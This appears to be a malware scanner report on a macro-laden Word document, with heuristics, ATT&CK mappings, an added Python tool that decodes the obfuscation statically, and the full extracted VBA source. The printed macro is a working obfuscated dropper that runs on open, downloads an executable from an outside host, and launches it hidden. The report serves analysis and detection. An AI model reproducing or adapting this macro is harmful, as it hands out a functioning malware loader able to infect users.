MALICIOUS
Risk Score: 190
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Word document whose VBA macro uses CreateObject to instantiate MSScriptControl.ScriptControl, sets its Language to JScript, and feeds it a heavily obfuscated JScript body. The ProgID, the language name, the script and its entry point are all built at runtime from short string fragments, most of them picked out of decoy arrays with Array(...)(n) and then concatenated, so none of them appears as a literal in the source. Reassembling the fragments in the extracted macro yields a function lol() that requests http://doc.invoice-sharepoint.com/office/updates.exe with Microsoft.XMLHTTP, writes the response body to a file in the temp folder through ADODB.Stream, and launches it with cmd.exe /c through WScript.Shell with a hidden window (window style 0). That is a download-and-execute dropper, consistent with the ClamAV name Doc.Dropper.Agent-1850693. AutoOpen calls the routine directly, so execution begins as soon as the document is opened with macros enabled.
Heuristics (7)
- ClamAV: Doc.Dropper.Agent-1850693 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-1850693.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): the document contains VBA macro code.
- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
    ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret
    Set notwidb = CreateObject(ynivra5)
    notwidb.Language = vhyca
  With the fragment assignments earlier in the same Sub, ynivra5 folds to "MSScriptControl.ScriptControl" and vhyca to "JScript"; the object is then given the script with AddCode and started with Run("lol").
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): the compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched line in script:
    Sub AutoOpen()
  Its body is a single call to bavmohfyzxo, the routine that builds and runs the script.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): the OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen. The heuristic's generic description states that no modern VBA project was recovered and no stronger macro-virus family marker was present; for this sample a VBA project was recovered (see Extracted artifacts), so read this marker as overlapping with the AutoOpen finding above. It is analyst-facing evidence for the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). The download URL used by the macro does not appear in this list because it exists only after runtime string concatenation; static URL extraction sees literal strings only.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8093 bytes | a56dc2ca98fe5773ef8197ff8cd35d7a3fa8271fdd3013562698806e698bb506 |
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub bavmohfyzxo()
Dim gkitsaw, ipifi, ynivra5, uvahryb, ejlaxzak, qtytitp, nivush, uzirret, unigir, iddepo, endixsoke3, odemf, waqga
Dim uryrnitk9
Dim ykymh
ipifi = "tCo"
unigir = "JScrip"
waqga = "cri"
uzirret = "ol"
ejlaxzak = "ptC"
ykymh = ".Sc"
odemf = "t"
nivush = "rip"
gkitsaw = "MSS"
uvahryb = "lol"
qtytitp = "rol"
endixsoke3 = "ont"
iddepo = "ntr"
alperesr = Array("ozku0", "558", "xcyq5", "605", "646", "632", "funct", "efke7", "756")(6) & Array("ugsy0", "wy6", "ion l", "553", "499", "tfu1", "yv7")(2) & Array("ol ()", "752", "619", "705", "et3", "modq6", "461", "620", "yzc0")(0) & Array("uwf2", "865", "idy4", " {var", "611")(3) & Array("eg3", " shel", "842", "uwy4", "816", "499", "670", "607")(1) & Array("unzu6", "407", "co6", "l = n", "egi7", "ete8")(3) & Array("674", "850", "kgy0", "czarx3", "ew Ac", "kja0", "lxej5")(4) & Array("823", "tiveX", "mno4", "zy7")(1) & Array("Objec", "780", "iju7", "468")(0) & Array("t (""W", "573", "412", "mawb7")(0)
kfore = Array("Scrip", "sawj4", "xryr7", "ko0", "570", "og3", "856")(0) & Array("777", "876", "542", "t.She", "edr9")(3) & Array("ll"");", "yx0", "acg2", "897", "yp2")(0) & Array("404", "726", "400", "var f", "657", "urz9")(3) & Array("so = ", "604", "455", "ubbe6", "522")(0) & Array("421", "813", "ux7", "new A")(3) & Array("fo1", "ctive", "og2", "ujt6", "894", "ubxi1", "733", "894", "urbu4")(1) & Array("XObje", "546", "807", "nwow5", "hyf3", "mjikr9", "690")(0) & Array("861", "utu4", "415", "471", "753", "ct (""")(5) & Array("yxi0", "pyl8", "504", "Scrip")(3)
calun5 = Array("yfe9", "465", "416", "igf4", "ting.")(4) & Array("702", "641", "FileS", "682", "knorv3", "njafk1", "uwf1", "831")(2) & Array("adb0", "ngyl3", "adb0", "628", "ew5", "amxu0", "743", "ystem")(7) & Array("463", "ihk8", "ma0", "Objec", "ix9", "741")(3) & Array("584", "t"");v", "itw3", "519", "801", "884", "ydze2", "on0", "548")(1) & Array("lsy6", "do4", "ahe3", "rda6", "ar tm")(4) & Array("642", "equ9", "p_pat", "or8", "869", "609", "oj8", "rru0", "cka3")(2) & Array("h = f", "822", "871", "xig0")(0) & Array("830", "so.Ge", "761", "vhy2")(1) & Array("tSpec", "627", "447", "ijh2", "ukpa1")(0)
tynpu5 = Array("ykj0", "ialFo", "ulu9", "442", "652")(1) & Array("duk0", "yp3", "494", "677", "kgus5", "lder(", "675", "758")(5) & Array("403", " 2) +", "rze2", "641", "563", "576", "esu0", "807")(1) & Array("hfi2", "476", " ""\\""", "559", "643", "gruw0", "eno0")(2) & Array("im5", " + fs", "qvub5", "509", "570", "884", "595", "850")(1) & Array("uqb0", "657", "o.Get", "xe9", "ane1", "uvmy0", "582", "ygz2", "tjumh2")(2) & Array("xli0", "TempN", "fnom8", "560", "710", "697", "403")(1) & Array("723", "rqa1", "ame()", "padl2")(2) & Array("omr8", "843", "863", "478", ";var ", "vlorf8", "549", "749", "724")(4) & Array("pum2", "strea", "637", "870", "476")(1)
hgebofu = Array("pi7", "are0", "an6", "799", "716", "hjy0", "exu4", "m = n")(7) & Array("ja1", "ew Ac", "ocka9", "ut3")(1) & Array("tiveX", "ratz0", "413", "884", "qbox9", "isi9", "499")(0) & Array("415", "ug7", "ika0", "Objec")(3) & Array("as5", "878", "dme2", "627", "t (""A")(4) & Array("529", "841", "zviw4", "703", "hko4", "DODB.")(5) & Array("as3", "712", "899", "cym1", "iq8", "rsy7", "aca9", "Strea", "ymk1")(7) & Array("744", "uc3", "obqo4", "inku0", "m"");s")(4) & Array("675", "885", "650", "486", "jwaxs6", "590", "687", "tream")(7) & Array(".Open", "498", "kma3", "jevq5", "ura3", "857", "583", "521", "421")(0)
yplidk = Array("iwq0", "531", "jfow6", "no4", "umy7", "793", "534", "();st", "uba5")(7) & Array("484", "649", "izb1", "ream.", "xwi2", "575", "ag6")(3) & Array("se4", "415", "431", "453", "797", "lu4", "Type ", "418", "ufl8")(6) & Array("838", "= 1;s", "czuh6", "ybl0", "890")(1) & Array("zu5", "691", "tream", "862", "ifte1", "634")(2) & Array(".Posi", "650", "668", "660")(0) & Array("ux0", "tion ", "wy7", "436", "748", "755", "522", "fecl2", "twitr8")(1) & Array("755", "cdiwl9", "= 0; ", "872", "ode1", "739", "795")(2) & Array("776", "bgy1", "aczo6", "448", "var a", "548")(4) & Array("407", "ss = ", "456", "882", "svu0", "voxp5")(1)
qrihko = Array("ykzy5", "859", "641", "ofi2", "ixzi5", "new A", "uvf0")(5) & Array("744", "begq0", "625", "595", "895", "ctive", "720", "460")(5) & Array("adty9", "768", "844", "XObje", "fuq8", "847", "wevt1")(3) & Array("747", "449", "425", "ct(""M", "428", "fly8", "522", "exi9", "qhi0")(3) & Array("vjos5", "vsurg8", "610", "icros", "ax4", "icte1")(3) & Array("ghe1", "xuz7", "ohco3", "ilva0", "608", "oft.X", "514")(5) & Array("716", "nrojk9", "836", "MLHTT", "517")(3) & Array("iz5", "zy9", "gotv2", "yv5", "473", "P"");a", "bputr7", "opb5")(5) & Array("ypri6", "ifa1", "mgywn0", "848", "bu6", "ss.op")(5) & Array("en(""G", "673", "570", "622", "vo0", "766", "551", "ahe3")(0)
qivaba3 = Array("836", "ET"", ", "ol6", "kiks5", "416")(1) & Array("466", "717", "756", """http")(3) & Array("wfas8", "547", "zlem2", "822", "747", "://do", "775", "598", "495")(5) & Array("428", "528", "838", "ywo0", "c.inv")(4) & Array("795", "785", "aw5", "gtu5", "oice-")(4) & Array("724", "bwa9", "share", "796")(2) & Array("point", "611", "bes9", "pe6", "430", "wufn8", "881", "797", "845")(0) & Array("743", "400", ".com/", "780", "yp0")(2) & Array("ipz8", "lwybn2", "offic", "843")(2) & Array("565", "ni1", "mij4", "880", "cja0", "e/upd", "402", "ego6", "opa9")(5)
kxexfyvji1 = Array("400", "440", "497", "ates.", "gsy0", "516", "580", "823")(3) & Array("pxu4", "exe"",", "406", "766", "631", "wyt8", "896", "uqlu4", "576")(1) & Array(" 0);a", "aho3", "507", "yvl9", "ox0", "aqw4")(0) & Array("ss.se", "hy0", "849", "co6", "493", "ism4", "575", "oz8")(0) & Array("dmyb5", "yl6", "857", "674", "846", "nd();")(5) & Array("kih2", "qse2", "isq6", "wne8", "683", "strea", "709", "vo1")(5) & Array("710", "m.Wri", "684", "iwe4", "ebi6", "430")(1) & Array("iwqa5", "iqry8", "te(as", "718", "kke5")(2) & Array("564", "677", "iw2", "s.Res", "rho5", "527")(3) & Array("759", "684", "ponse", "ijre0")(2)
suczu1 = Array("807", "hkebt0", "836", "bni0", "ol3", "Body)", "835", "750")(5) & Array("789", "744", "488", "538", "577", ";stre", "xmymc3")(5) & Array("qha4", "am.Sa", "gunf1", "438")(1) & Array("veToF", "yfe2", "qe6", "ony0")(0) & Array("671", "gha1", "ile(t", "493", "675", "an7")(2) & Array("ik8", "mp_pa", "ozmy2", "456", "nyq0", "de4", "gitc6", "411")(1) & Array("601", "735", "pqult0", "by4", "633", "th);s", "626", "595")(5) & Array("705", "676", "805", "pizg0", "uk1", "tream")(5) & Array("562", "vlar9", "fzyf9", "osu0", "iddi5", "825", "883", ".Clos", "umpa7")(7) & Array("789", "600", "437", "899", "760", "e();v")(5)
uxohidju = Array("ibqo8", "452", "604", "li5", "ar cm", "790")(4) & Array("zco9", "evwo2", "dfu6", "ci2", "482", "565", "drun ", "761", "817")(6) & Array("611", "865", "= ""cm", "611", "ig1", "oka3", "ad2")(2) & Array("uf2", "556", "693", "d.exe", "ha0")(3) & Array("752", "508", " /c """, "493", "yzj0", "ylgi0")(2) & Array(" + tm", "408", "576", "665", "461", "yle2", "524", "az0")(0) & Array("851", "p_pat", "yq4", "403", "nvebn0", "ubo1", "852", "506", "568")(1) & Array("cnock0", "yjz7", "uf8", "h; sh", "630")(3) & Array("431", "428", "ell.r", "554")(2) & Array("708", "449", "629", "yd4", "un(cm", "586", "708")(4)
jukidef1 = Array("402", "aja3", "inze1", "723", "724", "qo7", "drun,")(6) & Array("ymg6", "ect5", "844", "rkizc4", " 0);}", "ybi8", "444")(4)
uryrnitk9 = uvahryb
vhyca = unigir & odemf
ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret
Set notwidb = CreateObject(ynivra5)
notwidb.Language = vhyca
notwidb.AddCode (alperesr & kfore & calun5 & tynpu5 & hgebofu & yplidk & qrihko & qivaba3 & kxexfyvji1 & suczu1 & uxohidju & jukidef1)
notwidb.Run (uryrnitk9)
End Sub
Sub AutoOpen()
bavmohfyzxo
End Sub
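As an added example (not part of the analyzer's output or of the sample), the following Python folds this macro's string obfuscation statically, without executing any macro or script: it evaluates the `"..." & Array(...)(n) & variable` expressions line by line in the order the Sub assigns them, records what is passed to CreateObject, and resolves the arguments of .Language, .AddCode and .Run. The embedded sample reuses the ProgID, language and entry-point lines from the carved macros.bas verbatim and replaces the long AddCode payload with a constructed stub made of the first fragments of the real one, so it runs offline; pass the carved file as an argument to recover the full JScript.

```python
"""Static folding of the Array(...)(n) & "..." string obfuscation in macros.bas.

Added example, not analyzer code. Usage:  python fold_macro.py macros.bas
With no argument it runs on SAMPLE_VBA below.
"""
import re
import sys

# VBA string literal ("" escapes a quote), integer, identifier, punctuation, whitespace.
TOKEN_RE = re.compile(r'(?P<str>"(?:[^"]|"")*")|(?P<num>\d+)|(?P<id>[A-Za-z_]\w*)|(?P<op>[()&,=])|(?P<ws>\s+)')


def tokenize(text):
    toks = []
    for m in TOKEN_RE.finditer(text):
        if m.lastgroup == 'ws':
            continue
        val = m.group()
        if m.lastgroup == 'str':
            val = val[1:-1].replace('""', '"')
        toks.append((m.lastgroup, val))
    return toks


class VbaStringFolder:
    """expr := term ('&' term)*; term := literal | variable | '(' expr ')' | Array(...)(n)."""

    def __init__(self):
        self.env = {}          # variable name -> folded string, filled as the Sub assigns them

    def evaluate(self, rhs):
        self.toks, self.i = tokenize(rhs), 0
        value = self.expr()
        if self.i != len(self.toks):
            raise ValueError('trailing tokens in: ' + rhs)
        return value

    def peek(self):
        return self.toks[self.i] if self.i < len(self.toks) else (None, None)

    def take(self, kind, val=None):
        tok = self.peek()
        if tok[0] != kind or (val is not None and tok[1] != val):
            raise ValueError(f'expected {kind} {val!r}, got {tok!r}')
        self.i += 1
        return tok[1]

    def expr(self):
        parts = [self.term()]
        while self.peek() == ('op', '&'):
            self.i += 1
            parts.append(self.term())
        return ''.join(parts)

    def term(self):
        kind, val = self.peek()
        self.i += 1
        if kind in ('str', 'num'):
            return val
        if kind == 'op' and val == '(':            # ( expr ), as written in AddCode (...) / Run (...)
            inner = self.expr()
            self.take('op', ')')
            return inner
        if kind == 'id' and val == 'Array':        # Array("decoy", ..., "real", ...)(n) keeps element n
            self.take('op', '(')
            items = [self.expr()]
            while self.peek() == ('op', ','):
                self.i += 1
                items.append(self.expr())
            self.take('op', ')')
            self.take('op', '(')
            index = int(self.take('num'))
            self.take('op', ')')
            return items[index]
        if kind == 'id' and val in self.env:       # variable assigned earlier in the Sub
            return self.env[val]
        raise ValueError(f'cannot fold token {kind} {val!r}')


CREATEOBJ_RE = re.compile(r'^(?:Set\s+)?(\w+)\s*=\s*CreateObject\s*\((.+)\)$')
MEMBER_RE = re.compile(r'^(\w+)\.(\w+)\s*=?\s*(.+)$')
ASSIGN_RE = re.compile(r'^(\w+)\s*=\s*(.+)$')


def decode_macro(source):
    """Return ({object variable: ProgID}, [(object variable, member, folded argument), ...])."""
    folder = VbaStringFolder()
    objects, actions = {}, []
    for raw in source.splitlines():
        line = raw.strip()
        m = CREATEOBJ_RE.match(line)
        if m:
            objects[m.group(1)] = folder.evaluate(m.group(2))
            continue
        m = MEMBER_RE.match(line)
        if m and m.group(1) in objects:            # .Language = ..., .AddCode (...), .Run (...)
            actions.append((m.group(1), m.group(2), folder.evaluate(m.group(3))))
            continue
        m = ASSIGN_RE.match(line)
        if m:
            try:
                folder.env[m.group(1)] = folder.evaluate(m.group(2))
            except ValueError:
                pass                               # not a foldable string expression, ignore
    return objects, actions


# Constructed sample: ProgID/Language/Run lines are verbatim from the carved macros.bas;
# the AddCode payload is cut down to its first fragments plus a closing stub.
SAMPLE_VBA = '''
Sub bavmohfyzxo()
ipifi = "tCo"
unigir = "JScrip"
waqga = "cri"
uzirret = "ol"
ejlaxzak = "ptC"
ykymh = ".Sc"
odemf = "t"
nivush = "rip"
gkitsaw = "MSS"
uvahryb = "lol"
qtytitp = "rol"
endixsoke3 = "ont"
iddepo = "ntr"
alperesr = Array("ozku0", "558", "xcyq5", "605", "646", "632", "funct", "efke7", "756")(6) & Array("ugsy0", "wy6", "ion l", "553")(2) & Array("ol ()", "752", "619")(0) & Array("uwf2", "865", "idy4", " {var", "611")(3) & Array("eg3", " shel", "842")(1) & Array("unzu6", "407", "co6", "l = n")(3)
kfore = Array("674", "850", "kgy0", "czarx3", "ew Ac")(4) & Array("823", "tiveX", "mno4")(1) & Array("Objec", "780")(0) & Array("t (""W", "573")(0) & "Script.Shell"");}"
uryrnitk9 = uvahryb
vhyca = unigir & odemf
ynivra5 = gkitsaw & waqga & ejlaxzak & endixsoke3 & qtytitp & ykymh & nivush & ipifi & iddepo & uzirret
Set notwidb = CreateObject(ynivra5)
notwidb.Language = vhyca
notwidb.AddCode (alperesr & kfore)
notwidb.Run (uryrnitk9)
End Sub
'''


def decode_sample():
    return decode_macro(SAMPLE_VBA)


def report(objects, actions):
    lines = [f'CreateObject -> {name}: {progid}' for name, progid in objects.items()]
    lines += [f'{obj}.{member} <- {arg}' for obj, member, arg in actions]
    return '\n'.join(lines)


if __name__ == '__main__':
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding='utf-8', errors='replace') as fh:
            src = fh.read()
    else:
        src = SAMPLE_VBA
    print(report(*decode_macro(src)))
```

Run on the full macros.bas, the fold reports the ProgID MSScriptControl.ScriptControl, Language JScript, the complete lol() function with the download URL as a literal, and Run lol. Folding statically is the right first step here: it reveals the URL without detonating anything, and a sandbox run can mislead, since the ScriptControl (msscript.ocx) exists only as a 32-bit component, so the macro fails outright on 64-bit Office and the script never beacons to the download host.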